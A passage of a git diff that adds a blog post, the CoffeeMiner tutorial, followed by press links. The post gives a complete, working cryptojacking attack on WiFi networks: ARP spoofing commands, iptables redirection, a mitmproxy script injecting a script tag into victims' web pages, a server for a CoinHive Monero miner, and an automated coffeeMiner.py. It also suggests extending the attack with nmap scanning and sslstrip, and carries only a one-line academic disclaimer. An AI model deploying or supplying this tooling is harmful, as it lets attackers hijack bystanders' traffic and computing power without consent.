of all we need to download some Linux disk image and install it into a VirtualBox machine, for this example we will use Kali Linux images https://www.kali.org/ + +Once we have the ISO image downloaded, we prepare 3 VBox machines with the Linux image installed. + +To configure the defined scenario we need to prepare the machines each one with a role: + +- Victim + - will be the machine that connects to the Router and browse some pages. +- Attacker + - will be the machine where it runs the CoffeeMiner. Is the machine that performs the MITM. +- Router / Gateway + - will act as a normal gateway. + +![network](img/posts/coffeeMiner/scenario01.png "network") + +Once the attack is performed, the scenario will be: + +![network](img/posts/coffeeMiner/scenario02.png "network") + +To configure each one of the machines, we will do the following configuration: + +- Victim + - network adapter: + - eth0: Host-only Adapter + - /etc/network/interfaces: + +```bash +auto lo +iface lo inet loopback + +auto eth0 +iface eth0 inet static + address 10.0.2.10 + netmask 255.255.255.0 + gateway 10.0.2.15 +``` + +- Attacker + - network adapter: + - eth0: Host-only Adapter + - /etc/network/interfaces: + +```bash +auto lo +iface lo inet loopback + +auto eth0 +iface eth0 inet static + address 10.0.2.20 + netmask 255.255.255.0 + gateway 10.0.2.15 +``` + + +- Router / Gateway + - network adapter: + - eth0: Bridged Adapter + - eth1: Host-only Adapter + - /etc/network/interfaces: + +```bash +auto lo +iface lo inet loopback + +auto eth0 +iface eth0 inet dhcp + +auto eth1 +iface eth1 inet static + address 10.0.2.15 + netmask 255.255.255.0 +``` + +## 2. CoffeeMiner, understanding the code + +### 2.1 ARPspoofing +First of all, we need to understand how the MITM attack is performed. + +From wikipedia: + +*"In computer networking, ARP spoofing, ARP cache poisoning, or ARP poison routing, is a technique by which an attacker sends (spoofed) Address Resolution Protocol (ARP) messages onto a local area network. Generally, the aim is to associate the attacker's MAC address with the IP address of another host, such as the default gateway, causing any traffic meant for that IP address to be sent to the attacker instead."* + +https://en.wikipedia.org/wiki/ARP_spoofing + +To perform the ARPspoofing attack, we will use the **dsniff** library. + +```bash +arpspoof -i interface -t ipVictim ipGateway +arpspoof -i interface -t ipGateway ipVictim +``` + +### 2.2 mitmproxy +[mitmproxy](https://mitmproxy.org/) is a software tool that allows us to analyze the traffic that goes through a host, and allows to edit that traffic. In our case, we will use it to inject the javascript into the html pages. + +To make the process more more clean, we will only inject one line of code into the html pages. And will be that line of html code that will call to the javascript cryptocurrency miner. + +The line to inject the crypto miner is: +```html + +``` + + +### 2.3 Injector +Once we have the victim's traffic intercepted, we need to inject our script on it. We will use the mitmproxy API to do the injector: + +```python +from bs4 import BeautifulSoup +from mitmproxy import ctx, http +import argparse + +class Injector: + def __init__(self, path): + self.path = path + + def response(self, flow: http.HTTPFlow) -> None: + if self.path: + html = BeautifulSoup(flow.response.content, "html.parser") + print(self.path) + print(flow.response.headers["content-type"]) + if flow.response.headers["content-type"] == 'text/html': + script = html.new_tag( + "script", + src=self.path, + type='application/javascript') + html.body.insert(0, script) + flow.response.content = str(html).encode("utf8") + print("Script injected.") + +def start(): + parser = argparse.ArgumentParser() + parser.add_argument("path", type=str) + args = parser.parse_args() + return Injector(args.path) + +``` + + +### 2.4 HTTP Server +As we have seen, the injector adds a line to the html, with a call to our javascript crypto miner. So, we need to have the script file deployed in a HTTP Server. + +In order to serve the javascript cryptocurrency miner, we will deploy a HTTP Server in the attacker machine. To do that, we will use the Python library 'http.server': +```python +#!/usr/bin/env python +import http.server +import socketserver +import os + +PORT = 8000 + +web_dir = os.path.join(os.path.dirname(__file__), 'miner_script') +os.chdir(web_dir) + +Handler = http.server.SimpleHTTPRequestHandler +httpd = socketserver.TCPServer(("", PORT), Handler) +print("serving at port", PORT) +httpd.serve_forever() +``` +The code above is a simple HTTP Server that will serve our crypto miner to the victims, when they require it. + +The javascript miner, will be placed in the /miner_script directory. In our case, we have used the [CoinHive](https://coinhive.com/) javascript miner. + + +### 2.5 CoinHive crypto miner +[CoinHive](https://coinhive.com/) is a javascript miner for the [Monero cryptocurrency](https://coinmarketcap.com/es/currencies/monero/) (XMR). It can be added to a website, and will use the user CPU power to calculate hashes with the Cryptonight PoW hash algorithm to mine Monero, based on [CryptoNote](https://cryptonote.org/) protocol. + +CoinHive miner makes sense when user stays in a website for mid-long term sessions. So, for example, for a website where the users average session is arround 40 seconds, it doesn't make much sense. + +In our case, as we will inject the crypto miner in each one of the HTML pages that victims request, will have long term sessions to calculate hashes to mine Monero. + +![CoinHive logo](img/posts/coffeeMiner/coinhive-monero-logo.jpg "CoinHive logo") + +## 3. CoffeeMiner, puting all together +The main objective is to tie all the previous concepts in one autonomous deployment. This will be the CoffeeMiner. + +The idea is to have the CoffeeMiner script that performs the ARPspoofing attack and set ups the mitmproxy to inject the CoinHive cryptominer into victims HTML pages. + + +First of all, we need to configure the ip_forwarding and IPTABLES, in order to convert the attacker's machine into a proxy: + +```bash +echo 1 > /proc/sys/net/ipv4/ip_forward +iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE +iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 +``` + +To perform the ARPspoof for all the victims, we will prepare a 'victims.txt' file with all the victim's IP. +To read all the victims IPs, we prepare some Python lines, that will get the IPs (and also the gateway IP from the command line args), and performs the ARPspoof for each one of the victim's IP. + +```python +# get gateway_ip +gateway = sys.argv[1] +print("gateway: " + gateway) +# get victims_ip +victims = [line.rstrip('\n') for line in open("victims.txt")] +print("victims:") +print(victims) + +# run the arpspoof for each victim, each one in a new console +for victim in victims: + os.system("xterm -e arpspoof -i eth0 -t " + victim + " " + gateway + " &") + os.system("xterm -e arpspoof -i eth0 -t " + gateway + " " + victim + " &") +``` + +Once we have the ARPspoofing performed, we just need to run the HTTP Server: +```bash +> python3 httpServer.py +``` +And now, we can run the mitmproxy with the injector.py: +```bash +> mitmdump -s 'injector.py http://httpserverIP:8000/script.js' +``` + +## 3.1 CoffeeMiner, final script +Now we put all the concepts explained above in the 'coffeeMiner.py' script: + +```python +import os +import sys + +#get gateway_ip (router) +gateway = sys.argv[1] +print("gateway: " + gateway) +# get victims_ip +victims = [line.rstrip('\n') for line in open("victims.txt")] +print("victims:") +print(victims) + +# configure routing (IPTABLES) +os.system("echo 1 > /proc/sys/net/ipv4/ip_forward") +os.system("iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE") +os.system("iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080") +os.system("iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8080") + + +# run the arpspoof for each victim, each one in a new console +for victim in victims: + os.system("xterm -e arpspoof -i eth0 -t " + victim + " " + gateway + " &") + os.system("xterm -e arpspoof -i eth0 -t " + gateway + " " + victim + " &") + +# start the http server for serving the script.js, in a new console +os.system("xterm -hold -e 'python3 httpServer.py' &") + +# start the mitmproxy +os.system("~/.local/bin/mitmdump -s 'injector.py http://10.0.2.20:8000/script.js' -T") +``` +And also in the 'injector.py' script: + +```python +from bs4 import BeautifulSoup +from mitmproxy import ctx, http +import argparse + +class Injector: + def __init__(self, path): + self.path = path + + def response(self, flow: http.HTTPFlow) -> None: + if self.path: + html = BeautifulSoup(flow.response.content, "html.parser") + print(self.path) + print(flow.response.headers["content-type"]) + if flow.response.headers["content-type"] == 'text/html': + print(flow.response.headers["content-type"]) + script = html.new_tag( + "script", + src=self.path, + type='application/javascript') + html.body.insert(0, script) + flow.response.content = str(html).encode("utf8") + print("Script injected.") + +def start(): + parser = argparse.ArgumentParser() + parser.add_argument("path", type=str) + args = parser.parse_args() + return Injector(args.path) +``` + +And to execute, we just need to do: + +```bash +> python3 coffeeMiner.py RouterIP +``` + +## 4. Demo +In order to do the demo, we set up the VirtualBox scenario explained above. + +If we want to perform the attack manually, we will need the following terminals: + +![demo](img/posts/coffeeMiner/demo01.png "demo") + +Then, once the ARPspoofing attack is done and the injector and the HTTP Server are ready, we can go to the victim's machine and browse to a website. The victim's traffic will go through the attacker machine, and will activate the injector: + +![demo](img/posts/coffeeMiner/demo02.png "demo") + +As a result, the html pages that the victim is viewing, will have the html lines of code that the attacker has been injected. + +![demo](img/posts/coffeeMiner/coffeeMiner-demo-cutted.gif "demo") + +#### 4.1 Demo video + +In the following video, we can see the complete attack in the scenario, using the coffeeMiner.py script: + +- VirtualBox demo: + +[![video demo](img/posts/coffeeMiner/demo-video.png)](https://www.youtube.com/watch?v=wmYJ6Z4LoCA) + +- Real world WiFi network and laptops demo: + +[![video demo](img/posts/coffeeMiner/demo-realWiFi-video.png)](https://www.youtube.com/watch?v=-TnzGLUD0DU) + + +## Conclusion +As we have seen, the attack can be easily performed, and also can be deployed to be an autonomous attack in a WiFi network. + +Another thing to have in mind, is that for a real world WiFi network, is better to perform the process with a powerful WiFi antenna, to reach better all the physical zone. + +Tha main objective was to perform the autonomous attack, but we still need to edit the victims.txt file with the IP addresses of the victims devices. For a further version, a possible feature could be adding an autonomous [Nmap](https://nmap.org/) scan, to add the IPs detected to the CoffeeMiner victims list. Another further feature, could be adding [sslstrip](https://moxie.org/software/sslstrip/), to make sure the injection also in the websites that the user can request over HTTPS. + +The complete code is available in the github repo: https://github.com/arnaucube/coffeeMiner + +--- + +***Disclamer: this article & project is for academic purposes only.*** + +--- +*tags: python, cryptocurrency, miner, blockchain, mitm, wifi, javascript, hacking, html, cryptominer, python3* + + + +--- + +# References in the press about this article + +- English + - https://www.theregister.co.uk/2018/01/05/wi_fi_crypto_mining/ + - http://securityaffairs.co/wordpress/67438/hacking/coffeeminer-hacking-wifi-cryptocurrency.html + - https://gbhackers.com/coffeeminer-hacking-wifi/ + - https://www.privateinternetaccess.com/blog/2018/01/stop-coffeeminer-tool-injects-cryptocurrency-miner-html-requests-wifi-hotspots/ + - http://www.zdnet.com/article/how-to-hack-public-wi-fi-to-mine-for-cryptocurrency/ + - https://sensorstechforum.com/coffeeminer-malware-virus-detect-remove/ + - http://turningtrend.com/how-to-hack-public-wi-fi-to-mine-for-cryptocurrency/ + - https://www.theissue.com/technology/coffeeminer-demonstrates-how-hijackers-can-use-public-wi-fi-networks-to-mine-cryptocurrency + - https://koddos.net/blog/hackers-use-coffeeminer-hijack-public-wifi-hotspots-mine-cryptocurrency/?utm_source=Sociallymap&utm_medium=Sociallymap&utm_campaign=Sociallymap + - http://nymag.com/selectall/2018/01/coffeeminer-allows-hackers-to-mine-bitcoin-on-public-wi-fi.html + - https://medium.com/computerist/beware-coffeeminer-project-lets-you-hack-public-wi-fi-to-mine-cryptocoins-1915624c2ea5 + - https://resiliencepost.com/2018/01/12/coffeeminer-forces-coffee-shop-visitors-to-mine-for-monero/ + - https://fossbytes.com/coffeeminer-attack-wifi-attack-cryptomining/ + - https://securityboulevard.com/2018/01/coffeeminer-poc-targets-public-wi-fi-networks-to-mine-for-cryptocurrency/ + - https://latesthackingnews.com/2018/01/07/hacking-wireless-networks-use-coffeeminer-inject-cryptocurrency-miners/ + - https://nakedsecurity.sophos.com/2018/01/09/coffeeminer-project-lets-you-hack-public-wi-fi-to-mine-cryptocoins/ + - https://hotforsecurity.bitdefender.com/blog/coffeeminer-poc-targets-public-wi-fi-networks-to-mine-for-cryptocurrency-19414.html + - https://www.helpnetsecurity.com/2018/01/08/public-wifi-cryptocurrency-mining/ + - https://www.infosecurity-magazine.com/news/coffeeminer-mine-for-monero/ + - http://www.ibtimes.co.uk/what-coffeeminer-new-attack-lets-hackers-hijack-public-wifi-networks-mine-cryptocurrency-1654320 + +- Spanish + - http://www.elladodelmal.com/2018/01/coffeeminer-te-tomas-tu-cafe-te.html + - https://blogs.protegerse.com/2018/01/10/coffeeminer-minando-criptodivisas-sin-autorizacion-usando-la-wifi-como-vector-de-ataque/ + - http://noticiasseguridad.com/seguridad-informatica/coffeeminer-un-script-que-automatiza-la-inyeccion-de-codigo-para-minar-criptomoneda-en-redes-wi-fi/ + - https://www.redeszone.net/2018/01/06/coffeeminer-un-script-que-automatiza-la-inyeccion-de-codigo-para-minar-criptomoneda-en-redes-wi-fi/ + - https://terabytezone.com/coffeeminer-minado-criptomonedas-redes-wifi/ + - http://www.nexusmovil.com/coffeeminer-un-script-que-automatiza-la-inyeccion-de-codigo-para-minar-criptomoneda-en-redes-wi-fi/ + - https://www.coincrispy.com/2018/01/10/coffeeminer-ataque-mineria-criptomonedas/ + - https://www.criptonoticias.com/seguridad/coffeeminer-secuestra-redes-publicas-wi-fi-para-minar-criptomonedas/ + +- Russian + - https://forklog.com/ispanskij-issledovatel-razrabotal-majner-dlya-publichnyh-wi-fi-setej/ + - https://coinsider.com/p/news/2542-coffeeminer-novaya-programma-dlya-skrytogo-majninga-kriptovalyuty + - https://xakep.ru/2018/01/10/coffeeminer/ + +- Italian + - http://cybersecurity.startupitalia.eu/56384-20180108-coffeeminer-hackerare-le-reti-wifi-produrre-criptovalute + +- Bulgarian + - https://questona.com/coffeeminer-wifi/ + +- Greek + - https://www.youbrandinc.com/crytocurrency/%CF%80%CE%B1%CF%81%CE%B1%CE%B2%CE%B9%CE%AC%CF%83%CF%84%CE%B5-%CF%84%CE%BF-free-wi-fi-%CF%84%CE%B7%CF%82-%CE%B3%CE%B5%CE%B9%CF%84%CE%BF%CE%BD%CE%B9%CE%AC%CF%82-%CF%83%CE%B1%CF%82-%CE%B3%CE%B9%CE%B1-mon/ + +- Turkish + - http://blog.cyberage.com.tr/2018/01/10/coffeeminer/ + +- Dutch + - https://www.smartbiz.be/nieuws/173781/hoe-een-publiek-wifi-netwerk-kan-worden-gehackt-om-cryptomunten-te-minen/ + +- Chinese + - http://www.4hou.com/wireless/9773.html + - https://www.ithome.com.tw/news/120449 + +#### Destacated tweets +- @defcon https://twitter.com/defcon/status/949679959509012480 +- @x0rz https://twitter.com/x0rz/status/948865836609130496 +- @avast_antivirus https://twitter.com/avast_antivirus/status/951835917815308288 +- @fullstackpython https://twitter.com/fullstackpython/status/949707681543213057 +- @alienvault https://twitter.com/alienvault/status/950449599872929792 +- @binitamshah https://twitter.com/binitamshah/status/951520444900818945 +- @_odisseus https://twitter.com/_odisseus/status/951052521967144960 + +![tweets](img/posts/coffeeMiner/tweets_small.png "tweets") diff --git a/blogo-input/posts/coffeeminer_thumb.md b/blogo-input/posts/coffeeminer_thumb.md new file mode 100644 index 0000000..f17c58e --- /dev/null +++ b/blogo-input/posts/coffeeminer_thumb.md @@ -0,0 +1,4 @@ +## CoffeeMiner: Hacking WiFi to inject cryptocurrency miner to HTML requests +The goal of this post, is to explain how can be done the attack of MITM (Machine-In-The-Middle) to inject some javascript in the html pages, to force all the machines connected to a WiFi network to be mining a cryptocurrency for the attacker. + +*2018-01-04*